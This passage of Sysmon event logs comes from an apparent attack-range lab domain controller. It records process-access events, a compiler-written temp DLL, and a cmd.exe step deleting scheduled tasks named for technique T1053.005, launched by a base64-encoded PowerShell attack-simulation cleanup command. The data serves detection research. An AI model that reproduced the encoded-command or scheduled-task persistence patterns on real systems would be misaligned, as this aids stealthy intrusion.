C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.995","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6013,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.995\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.995","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6014,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.995\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.995","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6015,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.995\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.995","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6016,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.995\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.995","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6017,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.995\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.995","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6018,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.995\r\nSourceProcessGUID: {E2A3D6B1-11D8-5F25-0000-001077810800}\r\nSourceProcessId: 3824\r\nSourceThreadId: 4796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11DA-5F25-0000-0010E3C80800}\r\nTargetProcessId: 3080\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.995","SourceProcessGUID":"{E2A3D6B1-11D8-5F25-0000-001077810800}","SourceProcessId":"3824","SourceThreadId":"4796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-0010E3C80800}","TargetProcessId":"3080","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6019,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:22.010\r\nProcessGuid: {E2A3D6B1-11D9-5F25-0000-00106BC50800}\r\nProcessId: 4292\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\2fxol54o\\2fxol54o.dll\r\nCreationUtcTime: 2020-08-01 06:55:21.932","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:22.010","ProcessGuid":"{E2A3D6B1-11D9-5F25-0000-00106BC50800}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\2fxol54o\\2fxol54o.dll","CreationUtcTime":"2020-08-01 06:55:21.932","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6020,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.459\r\nProcessGuid: {E2A3D6B1-11DA-5F25-0000-001064CA0800}\r\nProcessId: 4720\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"schtasks /delete /tn \"T1053_005_OnLogon\" /f >nul 2>&1 & schtasks /delete /tn \"T1053_005_OnStartup\" /f >nul 2>&1\" \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D8-5F25-0000-0020C7800800}\r\nLogonId: 0x880C7\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-11D9-5F25-0000-0010B0A70800}\r\nParentProcessId: 1092\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADUAMwAuADAAMAA1ACIAIAAtAEMAbABlAGEAbgB1AHAA","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.459","ProcessGuid":"{E2A3D6B1-11DA-5F25-0000-001064CA0800}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"schtasks /delete /tn \"T1053_005_OnLogon\" /f &gt;nul 2&gt;&amp;1 &amp; schtasks /delete /tn \"T1053_005_OnStartup\" /f &gt;nul 2&gt;&amp;1\" ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D8-5F25-0000-0020C7800800}","LogonId":"0x880c7","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-11D9-5F25-0000-0010B0A70800}","ParentProcessId":"1092","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand 